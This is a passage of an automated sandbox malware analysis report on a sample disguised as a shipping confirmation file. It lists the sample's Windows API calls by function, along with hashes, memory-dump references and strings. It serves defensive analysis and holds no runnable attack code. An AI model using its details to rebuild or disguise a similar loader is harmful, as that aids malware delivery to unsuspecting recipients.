Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
Instruction ID: a9a910f18d9475f192186a99a32baa3f0737176f8f71227260f04108cb8f5765
Opcode Fuzzy Hash: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
Instruction Fuzzy Hash: CEE06D71A04108BFDB01ABA5BE499AEB3B9EB44354B20483FF102B00C8CA784D119A2D

Function 004023B7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D

Function 0040651D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 00406546

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: eb898ae1b777051f051c4ab58df26dcf4e878c8f9f4a5c47b005eb973d4bb03b
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 75E0E6B2010109BEEF095F50EC0AD7F371DE708710F11452EF906D4051E6B5E9309A39

Function 00406224 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040D27B,0040CEF0,0040357E,0040CEF0,0040D27B,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9

Function 004061F5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4

Function 733B2A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(733B505C,00000004,00000040,733B504C), ref: 733B2A9D

Memory Dump Source

Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 79290dd9464cd36c5819f94b6c37a7ed1c6d197540a162937773f6df204e9d7f
Instruction ID: dd3d0c2f1a27456f40e4f2f81c1fba4abe31a0a2f020bedfb9b98cbeb25c232f
Opcode Fuzzy Hash: 79290dd9464cd36c5819f94b6c37a7ed1c6d197540a162937773f6df204e9d7f
Instruction Fuzzy Hash: 02F0A5F2505280DEE3B1EF2A98847093BF8BB58305B24452BE19CD6641F33C4844CF91

Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749

Function 004064EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040657D,?,00421F28,?,?,Call,?,00000000), ref: 00406513

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59

Function 004035FD Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 733B2B98 Relevance: 1.4, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 733B2C57

Memory Dump Source

Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c1a4747436ef77c6cc13d2807373304bae5fae20f8fce4a919b49e28d4dda212
Instruction ID: df5b49f94f43260fc49a8928333f23c21e217e7cb8fee0f0d4505c0d9d3362b5
Opcode Fuzzy Hash: c1a4747436ef77c6cc13d2807373304bae5fae20f8fce4a919b49e28d4dda212
Instruction Fuzzy Hash: E3419FB290428CDFFB31EF65D881F59377DEB44351F308A2AE409C6950EA3D98828B90

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
Opcode Fuzzy Hash: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E

Function 733B12BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,733B12DB,?,733B137F,00000019,733B11CA,-000000A0), ref: 733B12C5

Memory Dump Source

Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: b328074e85bc4bfcc5e729b9e1a769bff94ba65656acf93b3c6c33f178644c4d
Instruction ID: ac3386a928ded417f0afa0fa788cea5a6f5f9855a752c23220bcbd4d1af586ae
Opcode Fuzzy Hash: b328074e85bc4bfcc5e729b9e1a769bff94ba65656acf93b3c6c33f178644c4d
Instruction Fuzzy Hash: CBB012B26000009FFE10AB15DC0AF34325CF700300F240000B608C1140E1284C008528

Non-executed Functions

Function 00405846 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004058A4
GetDlgItem.USER32(?,000003EE), ref: 004058B3
GetClientRect.USER32(?,?), ref: 004058F0
GetSystemMetrics.USER32(00000002), ref: 004058F7
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
ShowWindow.USER32(?,00000008), ref: 00405993
GetDlgItem.USER32(?,000003EC), ref: 004059B4
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
GetDlgItem.USER32(?,000003F8), ref: 004058C2

Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644

GetDlgItem.USER32(?,000003EC), ref: 00405A06
CreateThread.KERNEL32(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
CloseHandle.KERNEL32(00000000), ref: 00405A1B
ShowWindow.USER32(00000000), ref: 00405A3F
ShowWindow.USER32(?,00000008), ref: 00405A44
ShowWindow.USER32(00000008), ref: 00405A8E
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
CreatePopupMenu.USER32 ref: 00405AD3
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
GetWindowRect.USER32(?,?), ref: 00405B07
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
OpenClipboard.USER32(00000000), ref: 00405B68
EmptyClipboard.USER32 ref: 00405B6E
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
GlobalLock.KERNEL32(00000000), ref: 00405B84
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
CloseClipboard.USER32 ref: 00405BC9

Strings

H/B, xrefs: 00405B34
{, xrefs: 00405AAC

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H/B${
API String ID: 590372296-332483393
Opcode ID: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
Opcode Fuzzy Hash: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68

Function 00404AF2 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B41
SetWindowTextW.USER32(00000000,?), ref: 00404B6B
SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
CoTaskMemFree.OLE32(00000000), ref: 00404C27
lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C59
lstrcatW.KERNEL32(?,Call), ref: 00404C65
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77

Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9

Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
Part of subcall function 00406930: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA

GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D3A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55

Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B

Strings

user32::EnumWindows(i r1 ,i 0), xrefs: 00404B0B
H/B, xrefs: 00404BEF
A, xrefs: 00404C15
C:\Users\user\eftermodnendes\ringeagt, xrefs: 00404C42
Call, xrefs: 00404C53, 00404C58, 00404C63

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

